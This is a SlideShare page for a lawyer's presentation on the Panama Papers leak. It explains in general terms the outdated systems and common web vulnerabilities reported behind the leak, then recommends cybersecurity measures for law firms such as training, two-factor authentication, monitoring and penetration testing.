SlideShare a Scribd company logo

Panama Papers Leak and Precautions Law firms should take

Download as PPTX, PDF
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]

The document discusses lessons that can be learned from the Panama Papers data leak. It summarizes how the leak occurred due to vulnerabilities in the law firm's outdated content management and email systems. It then outlines 10 common web application vulnerabilities like injection attacks, broken authentication, and sensitive data exposure. Finally, it provides recommendations for law firms to strengthen cybersecurity, such as implementing training, monitoring systems, conducting security audits, and engaging third-party penetration testing. The key takeaway is that all law firms must prioritize data security even if they believe they are not high-value targets.

1 of 30
An expose by Lawyers ! What to learn from the Panama Papers Leak Adv. Prashant Mali 1Advocate Prashant Mali (www.prashantmali.com)
The Background • Data breach at , a Panamian law firm is being touted as the largest ever, in terms of the sheer volume of information leaked. • The leaked information allegedly details the ways dozens of high-ranking politicians, their relatives or close associates in more than 50 countries, including U.K., France, Russia, China and India, have used offshore companies to hide income and avoid paying taxes. 2Advocate Prashant Mali (www.prashantmali.com)
The Numbers • Reportedly cover 11.5 million confidential documents dating from 1970s to late 2015. • The 2.6 terabytes of leaked data includes: 4.8 million emails 3 million database files 2.2 million PDFs 1.1 million images 320,000 text documents 3Advocate Prashant Mali (www.prashantmali.com)
How did the Leak happen? • The leak stems from an email hack • An email server attack could have happened in multiple ways • The firm’s client portal found vulnerable to the DROWN vulnerability, which was using the old, deprecated SSLv2 encryption protocol on servers 4Advocate Prashant Mali
How did the Leak happen? • Portal was using the open source Drupal Content Management System (CMS) which was outdated and not updated since two years. • This outdated CMS version on the portal was vulnerable to SQL injection which generally, responsible for 97% of the data breaches across the world. • Other application layer vulnerabilities on the portal were Cross Site Scripting, Cross Sight Request Forgery, and Brute Force Bypass, etc. 5Advocate Prashant Mali (www.prashantmali.com)
How did the Leak happen? • Security researchers have claimed that certain backend portions of the site were also accessible with simple commands that any high school hacker could have guessed. • Even the Microsoft’s Outlook at Mossack Fonseca was last updated seven years back in 2009. • The emails were not even encrypted which made incredibly easy for hackers to get admin level privileges with such application and system level security standards 6Advocate Prashant Mali (www.prashantmali.com)
1. Injection • It happens when account login page does not filter user inputs correctly. • Hackers can use commands to enter through this and claim legitimate access. • Moreover, they can use anything from sign-in forms to comments box and send commands to the server. • Business risk: Hackers have direct way of interacting with the server • They can steal data, change it, delete it, deny access and do much more! • In fact, injection attacks such as SQL Injection are allegedly responsible for major data breaches at Ashley Madison and Sony 7Advocate Prashant Mali (www.prashantmali.com)
2. Broken Authentication & Session Management • Negligence in customer accounts, password recovery and even sessions can lead to increased security risks • Essential to have high degree of control over account log-in using unique user ID and password • Business risk: Hackers are allowed to claim complete account access. • In severe cases, stolen database records are sold to underground black market 8Advocate Prashant Mali (www.prashantmali.com)
3. Cross-site Scripting • The most common vulnerability – with this weakness, attackers could use web applications to send malicious script to a user’s browser • Poses threat to both, users and website • Hackers basically intercept communication between server & browser to inject malicious codes at both ends. • Cross-Site Scripting not only harms the website but also allows attacks to redirect users to any other URL • Business risk: Hackers can change the homepage of the website, inject malware on the site • Usually leads to websites getting blocked by search engines and browsers! 9Advocate Prashant Mali
4. Insecure Direct Object References • This vulnerability can be seen when we simply change a few numbers in URL and press enter and thereby allowed to access unprivileged data because the numbers were predictable • Multiple predictable patterns that will allow hackers to get into database and access restricted data • Business risk: An attacker can access and expose a lot of data • Security is compromised, although, he cannot make many changes 10Advocate Prashant Mali
5. Security Misconfiguration • Misconfigured security is a tough vulnerability to handle as it takes into account all security lapses at every level of the application • Most system admins ignore changing their passwords or even disabling ports and accounts they do not use anymore • Attackers look for such small lapses, combine them, and try to make something big out of it • Business risk: Can lead to complete loss of data through alteration, deletion and theft • Attackers can use one vulnerability after the other to access the database 11Advocate Prashant Mali
6. Sensitive Data Exposure • Data should be stored or transmitted only by encrypting it with cryptographic algorithms • It ensures that even if the passwords or credit card details are stolen, hackers cannot do anything with it • Critical to keep the data encrypted in such a way that only authorized keys or algorithms unlock it • Business risk: Loss of sensitive data, passwords, credit card information, addresses and bank statements • May have serious repercussions on credibility 12Advocate Prashant Mali (www.prashantmali.com)
7. Missing Function Level Access Control • Admin function controls are the most important ones and should be restricted • Most companies do not bother reassuring that only authorized accounts access privileged information. • Business risk: Once the attacker gains admin access, he can change a lot things including application data and settings • Serious tangible and intangible consequences and loss of credibility 13Advocate Prashant Mali (www.prashantmali.com)
8. Cross-Site Request Forgery (CSRF) • It is the case of malicious link hidden in an image on the random website that is visited by the customer • Fraudsters alter the URL for the customer to initiate a command that the customer doesn’t even know about • Business risk: There would be random requests, purchases, and money transfers • One could never be sure about its genuinity and customers will gradually lose trust in the website 14Advocate Prashant Mali (www.prashantmali.com)
9. Using Components with Known Vulnerabilities • Sometimes application developers use open source projects with unknown loopholes like unknown application codes • Business risk: Unknown application codes brings unknown risks • Cross-site scripting, injection risks and business logic loopholes are just some of the examples • Such vulnerability brings data breach, access control, defacements and theft risks 15Advocate Prashant Mali (www.prashantmali.com)
10. Invalidated Redirects and Forwards • Customer is taken to a website which looks exactly like the one he wants, but, it is not the same! Fraudsters can get the information needed through it • Most websites don’t even know about such unauthorized redirects that look genuine • Customers should be more careful about phishing. However, its not possible for a customer to know whether he is redirected to a wrong website or not. Onus is on website owner! • Business risk: Attackers can install malware or access user accounts with phishing • Customers lose trust in attacked website forever 16Advocate Prashant Mali (www.prashantmali.com)
Solutions for such Attacks • A complete web application security solution is needed – to detect, protect and monitor various attacks • Total Application Security (TAS) is industry’s integrated web application security and compliance solution • It helps organizations to detect application layer vulnerabilities accurately, patch them instantly without any change in code, and continuously monitor for emerging threats and DDoS attacks to mitigate them • TAS does this accurately with web application scanning (detect), patches them instantly with web application firewall (protect), and monitors traffic continuously for emerging threats and DDoS attacks (monitor) • Also includes 24x7 managed service support to perform pen testing, create custom rules, and maintain zero false positives 17Advocate Prashant Mali (www.prashantmali.com)
Ensure Data Security at your Law firm • Up to now, the only entities that seemed concerned with data security were large corporations and health care organizations • With reports of security breaches making headline news on a weekly basis, data security has become top-of-mind for every business and for every person who carries and uses a credit card • The threat of a data breach attack is a risk for law firms, too • The threat is reason enough to enact more stringent security policies, but there is another compelling reason: the security requirements of your own clients • Small law firms might think that they are not a target, but even they have clients with desirable data. It could even be that your law firm is a much easier target than a corporate entity • It’s a problem law firms cannot ignore, no matter their size 18Advocate Prashant Mali (www.prashantmali.com)
What can Law firms of any size do to better manage Cyber security ? 19Advocate Prashant Mali (www.prashantmali.com)
Control Chaos • If you need to make changes to security, the changes should be implemented in a way that does not impede attorney’s abilities to perform work for clients. • Your firm should balance the need to protect client data and the need to access it. • Consider the remediation steps for preventing the Crypto-Locker virus. You can lock down the firm’s firewalls, desktops and email, but if done in an overly aggressive manner the changes could have potentially negative side effects such as users cannot upload to court websites; one-off application like those common for litigation, may fail; email scanning false positives caused missed email, etc. • With planning, training, proper advance notification and staggering the change among users, the side effects can be minimized. 20Advocate Prashant Mali
Prepare, Plan and Train • Disruptions in productivity can be avoided through careful technology selection, planning and preparation. • These days, maintaining a current firewall is not enough protection. Select the most appropriate security systems that provide the best mix of ease of use and security • Implement new systems and procedures only after they are vetted and tested by a small group of users • Prepare new users by giving them advance notice and creating a training plan that covers the topics in a language they understand. • Security awareness training is designed to increase end user’s awareness of the firm’s security policies and potential threats to the firm, and to increase their willingness to adhere to the firm’s security requirements. • It is probably the most important step to preventing incidents, such as the Crypto-Locker virus that has infected numerous law firms in the last few months. 21Advocate Prashant Mali
You should plan to cover • Electronic communications • Incident reporting • Internet access • Mobile device security • Password policies • Remote access • Social media use • The firm’s Acceptable Use Policy • Visitor policies • Wireless access security 22Advocate Prashant Mali (www.prashantmali.com)
Verify Your Vendors • Your firm’s vendors must also follow proper security protocols • Vendors, especially those hosting your data in the cloud, need to pay particular attention to securing and protecting your data • Review every vendor’s commitment to protecting your data, as well as their security certifications and policies 23Advocate Prashant Mali (www.prashantmali.com)
Monitor Your Systems • Every firm should employ top-notch antivirus, antispam, malware and intrusion detection • Manage these critical systems to ensure that protection is active (e.g., not disabled by the end users) and up to date • Routinely check firewall logs. These will highlight the extent to which your users are under attack and make you aware of administrative access and changes to your firewall • Periodically check the firewall configuration for unwanted changes. • You also should manage and monitor user accounts and scan for user accounts that have not been accessed for a period of time, stale passwords and membership in administrative groups • Every IT administrator has added users to high-level security groups, such as domain administrators, in order to test and troubleshoot issues only to accidentally leave them in groups where they do not belong. 24Advocate Prashant Mali
Make System Entry Difficult • Law firms of all sizes should be using two-factor authentication • Two-factor authentication requires two things from a user before they are allowed to access a system: something the user has and something the user knows • The item the user has is a token, either a physical token or an application on a smartphone • The thing the user knows is his password or PIN • Together, these items provide a significant increase in the security of systems accessed remotely. 25Advocate Prashant Mali (www.prashantmali.com)
Prioritize Physical Security • Physical security is also important • Server room doors and cabinets should be locked when possible • You also may want to consider investing in an affordable security camera system that includes options for recording physical access. • Stored data should be encrypted • Consider implementing a clean-and-clear desk policy, which requires everyone to log off of their computers when not using them and to lock computers when they walk away • The policy should extend to laptops and other data storage devices, which should be locked when the employee is not present • No data, either printed or electronic, should be left unattended 26Advocate Prashant Mali (www.prashantmali.com)
Engage 3rd Party for Security Audits • After you’ve determined your new policies, put new systems and protections in place and trained your end users, you should consider bringing in a third party • Someone not regularly involved with the firm’s day- to-day IT needs to perform a security analysis • An outside security expert will perform a top- down evaluation of your systems, security policies and practices, and will review physical access to the systems 27Advocate Prashant Mali (www.prashantmali.com)
Try to Break In • A penetration test is the process of trying to break into a system in order to identify any vulnerability • A pen test has to be executed with care, because if it is performed recklessly it can cause system or network damage through buffer overflows, Denial of Service (DoS) attacks and misconfiguration of systems • Strive to repeat pen tests at least annually or with more frequency • If you change your firewall or other major systems throughout the year, you should repeat a pen test 28Advocate Prashant Mali (www.prashantmali.com)
Remediate Carefully • At the end of a security audit or pen test, you will receive a remediation plan • The IT department should carefully review the recommended changes before implementation to consider any possible adverse effects on other systems and end users • Some believe that threats are irrelevant for small firms, but nothing could be further from the truth! • It is increasingly common for clients of law firms to dictate security requirements, so all firms should make strengthening security policies a top priority 29Advocate Prashant Mali (www.prashantmali.com)
THANK YOU ADV. PRASHANT MALI Email: cyberlawconsulting@gmail.com Web site: www.prashantmali.com Twitter : @CyberMahaGuru 30Advocate Prashant Mali (www.prashantmali.com)

Recommended

secure from Phishing Hacking and Keylogger
secure from Phishing Hacking and Keylogger secure from Phishing Hacking and Keylogger
secure from Phishing Hacking and Keylogger
Abhishek Hirapara
 
The Rise of Spear Phishing & How to Avoid being the Next Headline
The Rise of Spear Phishing & How to Avoid being the Next HeadlineThe Rise of Spear Phishing & How to Avoid being the Next Headline
The Rise of Spear Phishing & How to Avoid being the Next Headline
PhishLabs
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
Sachin Saini
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
PhishLabs
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
Dumindu Pahalawatta
 
hacking presentation
hacking presentationhacking presentation
hacking presentation
ravisarode2
 
Anti phishing
Anti phishingAnti phishing
Anti phishing
Shethwala Ridhvesh
 
Strategies to handle Phishing attacks
Strategies to handle Phishing attacksStrategies to handle Phishing attacks
Strategies to handle Phishing attacks
Sreejith.D. Menon
 

Recommended

secure from Phishing Hacking and Keylogger
secure from Phishing Hacking and Keylogger secure from Phishing Hacking and Keylogger
secure from Phishing Hacking and Keylogger
Abhishek Hirapara
 
The Rise of Spear Phishing & How to Avoid being the Next Headline
The Rise of Spear Phishing & How to Avoid being the Next HeadlineThe Rise of Spear Phishing & How to Avoid being the Next Headline
The Rise of Spear Phishing & How to Avoid being the Next Headline
PhishLabs
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
Sachin Saini
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
PhishLabs
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
Dumindu Pahalawatta
 
hacking presentation
hacking presentationhacking presentation
hacking presentation
ravisarode2
 
Anti phishing
Anti phishingAnti phishing
Anti phishing
Shethwala Ridhvesh
 
Strategies to handle Phishing attacks
Strategies to handle Phishing attacksStrategies to handle Phishing attacks
Strategies to handle Phishing attacks
Sreejith.D. Menon
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
Avishek Datta
 
Web Application Hacking 2004
Web Application Hacking 2004Web Application Hacking 2004
Web Application Hacking 2004
Mike Spaulding
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
elakkiya poongunran
 
Phishing
PhishingPhishing
Phishing
anjalika sinha
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposedtamfin
 
Phishing
PhishingPhishing
Phishing
Jayaseelan Vejayon
 
Security in e-commerce
Security in e-commerceSecurity in e-commerce
Security in e-commerce
SensePost
 
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONSE-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
rausdeen anfas
 
Security issues in e business
Security issues in e businessSecurity issues in e business
Security issues in e business
Rahul Kumar
 
Critical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target BreachCritical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target Breach
Teri Radichel
 
Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?
Splunk
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
WhoisXML API
 
Phishing
PhishingPhishing
Phishing
Sagar Rai
 
Recent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology GroupRecent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology Group
Accellis Technology Group
 
Phishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayPhishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information Highway
Kevin Lim
 
Phishing
PhishingPhishing
PhishingKiran Patil
 
Phishing
PhishingPhishing
Phishing
shivli0769
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Alan McSweeney
 
Phishing
PhishingPhishing
Phishing
Arpit Patel
 
Cyber Insurance Types of Attacks
Cyber Insurance Types of AttacksCyber Insurance Types of Attacks
Cyber Insurance Types of Attacks
Statewide Insurance Brokers
 
PANAMA LEAKS
PANAMA LEAKSPANAMA LEAKS
PANAMA LEAKS
Swedish College of Engineering & Technology Rahim yar khan
 
Presentation Penama Leaks
Presentation Penama LeaksPresentation Penama Leaks
Presentation Penama Leaks
sidra khalid
 

More Related Content

What's hot

Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
Avishek Datta
 
Web Application Hacking 2004
Web Application Hacking 2004Web Application Hacking 2004
Web Application Hacking 2004
Mike Spaulding
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
elakkiya poongunran
 
Phishing
PhishingPhishing
Phishing
anjalika sinha
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposedtamfin
 
Phishing
PhishingPhishing
Phishing
Jayaseelan Vejayon
 
Security in e-commerce
Security in e-commerceSecurity in e-commerce
Security in e-commerce
SensePost
 
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONSE-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
rausdeen anfas
 
Security issues in e business
Security issues in e businessSecurity issues in e business
Security issues in e business
Rahul Kumar
 
Critical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target BreachCritical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target Breach
Teri Radichel
 
Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?
Splunk
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
WhoisXML API
 
Phishing
PhishingPhishing
Phishing
Sagar Rai
 
Recent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology GroupRecent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology Group
Accellis Technology Group
 
Phishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayPhishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information Highway
Kevin Lim
 
Phishing
PhishingPhishing
Phishing
shivli0769
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Alan McSweeney
 
Phishing
PhishingPhishing
Phishing
Arpit Patel
 
Cyber Insurance Types of Attacks
Cyber Insurance Types of AttacksCyber Insurance Types of Attacks
Cyber Insurance Types of Attacks
Statewide Insurance Brokers
 

What's hot (20)

Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
 
Web Application Hacking 2004
Web Application Hacking 2004Web Application Hacking 2004
Web Application Hacking 2004
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
 
Phishing
PhishingPhishing
Phishing
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposed
 
Phishing
PhishingPhishing
Phishing
 
Security in e-commerce
Security in e-commerceSecurity in e-commerce
Security in e-commerce
 
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONSE-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
E-COMMERCE SECURITY, FRAUD ISSUES AND PROTECTIONS
 
Security issues in e business
Security issues in e businessSecurity issues in e business
Security issues in e business
 
Critical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target BreachCritical Controls Might Have Prevented the Target Breach
Critical Controls Might Have Prevented the Target Breach
 
Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?Phishing Attacks - Are You Ready to Respond?
Phishing Attacks - Are You Ready to Respond?
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
 
Phishing
PhishingPhishing
Phishing
 
Recent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology GroupRecent Legal Cyber Attacks Presented by Accellis Technology Group
Recent Legal Cyber Attacks Presented by Accellis Technology Group
 
Phishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayPhishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information Highway
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
 
Phishing
PhishingPhishing
Phishing
 
Cyber Insurance Types of Attacks
Cyber Insurance Types of AttacksCyber Insurance Types of Attacks
Cyber Insurance Types of Attacks
 

Viewers also liked

Presentation Penama Leaks
Presentation Penama LeaksPresentation Penama Leaks
Presentation Penama Leaks
sidra khalid
 
Disqualification of Prime Minister of Pakistan(Panama Papers case)
Disqualification of Prime Minister of Pakistan(Panama Papers case)Disqualification of Prime Minister of Pakistan(Panama Papers case)
Disqualification of Prime Minister of Pakistan(Panama Papers case)
Shahid Mehmood
 
Panama Papers( leaks) ? The Biggest Financial leaks in History.
Panama Papers( leaks) ? The Biggest Financial leaks in History.Panama Papers( leaks) ? The Biggest Financial leaks in History.
Panama Papers( leaks) ? The Biggest Financial leaks in History.
Arslan Haider
 
Panama papers case study
Panama papers case studyPanama papers case study
Panama papers case study
Suchini Priyangika
 
how pakistani media covers panama leak
how pakistani media covers panama leakhow pakistani media covers panama leak
how pakistani media covers panama leak
asim jon
 
Panama Papers - The Biggest Financial Leak in History
Panama Papers - The Biggest Financial Leak in HistoryPanama Papers - The Biggest Financial Leak in History
Panama Papers - The Biggest Financial Leak in History
Stinson
 
Industrial sector of Pakistan
Industrial sector of PakistanIndustrial sector of Pakistan
Industrial sector of Pakistan
farazishaque
 
Issues in Pakistan Industry
Issues in Pakistan IndustryIssues in Pakistan Industry
Issues in Pakistan Industry
Saroosh Zahid
 
STRATEGIC MANAGEMENT - NESTLE COMPANY
STRATEGIC MANAGEMENT - NESTLE COMPANYSTRATEGIC MANAGEMENT - NESTLE COMPANY
STRATEGIC MANAGEMENT - NESTLE COMPANYSiti Rizki
 
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
Carol Smith
 

Viewers also liked (11)

PANAMA LEAKS
PANAMA LEAKSPANAMA LEAKS
PANAMA LEAKS
 
Presentation Penama Leaks
Presentation Penama LeaksPresentation Penama Leaks
Presentation Penama Leaks
 
Disqualification of Prime Minister of Pakistan(Panama Papers case)
Disqualification of Prime Minister of Pakistan(Panama Papers case)Disqualification of Prime Minister of Pakistan(Panama Papers case)
Disqualification of Prime Minister of Pakistan(Panama Papers case)
 
Panama Papers( leaks) ? The Biggest Financial leaks in History.
Panama Papers( leaks) ? The Biggest Financial leaks in History.Panama Papers( leaks) ? The Biggest Financial leaks in History.
Panama Papers( leaks) ? The Biggest Financial leaks in History.
 
Panama papers case study
Panama papers case studyPanama papers case study
Panama papers case study
 
how pakistani media covers panama leak
how pakistani media covers panama leakhow pakistani media covers panama leak
how pakistani media covers panama leak
 
Panama Papers - The Biggest Financial Leak in History
Panama Papers - The Biggest Financial Leak in HistoryPanama Papers - The Biggest Financial Leak in History
Panama Papers - The Biggest Financial Leak in History
 
Industrial sector of Pakistan
Industrial sector of PakistanIndustrial sector of Pakistan
Industrial sector of Pakistan
 
Issues in Pakistan Industry
Issues in Pakistan IndustryIssues in Pakistan Industry
Issues in Pakistan Industry
 
STRATEGIC MANAGEMENT - NESTLE COMPANY
STRATEGIC MANAGEMENT - NESTLE COMPANYSTRATEGIC MANAGEMENT - NESTLE COMPANY
STRATEGIC MANAGEMENT - NESTLE COMPANY
 
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
 

Similar to Panama Papers Leak and Precautions Law firms should take

Cybersecurity Training
Cybersecurity TrainingCybersecurity Training
Cybersecurity Training
WindstoneHealth
 
10 ways to protect your e commerce site from hacking & fraud
10 ways to protect your e commerce site from hacking & fraud10 ways to protect your e commerce site from hacking & fraud
10 ways to protect your e commerce site from hacking & fraud
WebSitePulse
 
Cyber 101 for smb execs v1
Cyber 101 for smb execs v1Cyber 101 for smb execs v1
Cyber 101 for smb execs v1
NetWatcher
 
Phishing
PhishingPhishing
Phishing
Ajit Yadav
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
Akash Mahajan
 
Meeting the Cybersecurity Challenge
Meeting the Cybersecurity ChallengeMeeting the Cybersecurity Challenge
Meeting the Cybersecurity Challenge
Net at Work
 
Cybercrime
CybercrimeCybercrime
Cybercrime
deepika28g
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
IRJET Journal
 
Cyber security awareness for end users
Cyber security awareness for end usersCyber security awareness for end users
Cyber security awareness for end users
NetWatcher
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
Prateek Jain
 
Reducing the Impact of Cyber Attacks
Reducing the Impact of Cyber AttacksReducing the Impact of Cyber Attacks
Reducing the Impact of Cyber Attacks
James Cash
 
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisLuncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
North Texas Chapter of the ISSA
 
Module 3-cyber security
Module 3-cyber securityModule 3-cyber security
Module 3-cyber security
Sweta Kumari Barnwal
 
Ethical hacking and social engineering
Ethical hacking and social engineeringEthical hacking and social engineering
Ethical hacking and social engineering
Sweta Kumari Barnwal
 
cyber security presentation 1234567.pptx
cyber security presentation 1234567.pptxcyber security presentation 1234567.pptx
cyber security presentation 1234567.pptx
prashanth73488
 
ITSolutions|Currie Network Security Seminar
ITSolutions|Currie Network Security SeminarITSolutions|Currie Network Security Seminar
ITSolutions|Currie Network Security Seminar
Daniel Versola
 
Protecting Your Business From Cybercrime
Protecting Your Business From CybercrimeProtecting Your Business From Cybercrime
Protecting Your Business From Cybercrime
David J Rosenthal
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
GDSCCVR
 
attack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptxattack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptx
JenetSilence
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM i
Precisely
 

Similar to Panama Papers Leak and Precautions Law firms should take (20)

Cybersecurity Training
Cybersecurity TrainingCybersecurity Training
Cybersecurity Training
 
10 ways to protect your e commerce site from hacking & fraud
10 ways to protect your e commerce site from hacking & fraud10 ways to protect your e commerce site from hacking & fraud
10 ways to protect your e commerce site from hacking & fraud
 
Cyber 101 for smb execs v1
Cyber 101 for smb execs v1Cyber 101 for smb execs v1
Cyber 101 for smb execs v1
 
Phishing
PhishingPhishing
Phishing
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
 
Meeting the Cybersecurity Challenge
Meeting the Cybersecurity ChallengeMeeting the Cybersecurity Challenge
Meeting the Cybersecurity Challenge
 
Cybercrime
CybercrimeCybercrime
Cybercrime
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Cyber security awareness for end users
Cyber security awareness for end usersCyber security awareness for end users
Cyber security awareness for end users
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Reducing the Impact of Cyber Attacks
Reducing the Impact of Cyber AttacksReducing the Impact of Cyber Attacks
Reducing the Impact of Cyber Attacks
 
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisLuncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
 
Module 3-cyber security
Module 3-cyber securityModule 3-cyber security
Module 3-cyber security
 
Ethical hacking and social engineering
Ethical hacking and social engineeringEthical hacking and social engineering
Ethical hacking and social engineering
 
cyber security presentation 1234567.pptx
cyber security presentation 1234567.pptxcyber security presentation 1234567.pptx
cyber security presentation 1234567.pptx
 
ITSolutions|Currie Network Security Seminar
ITSolutions|Currie Network Security SeminarITSolutions|Currie Network Security Seminar
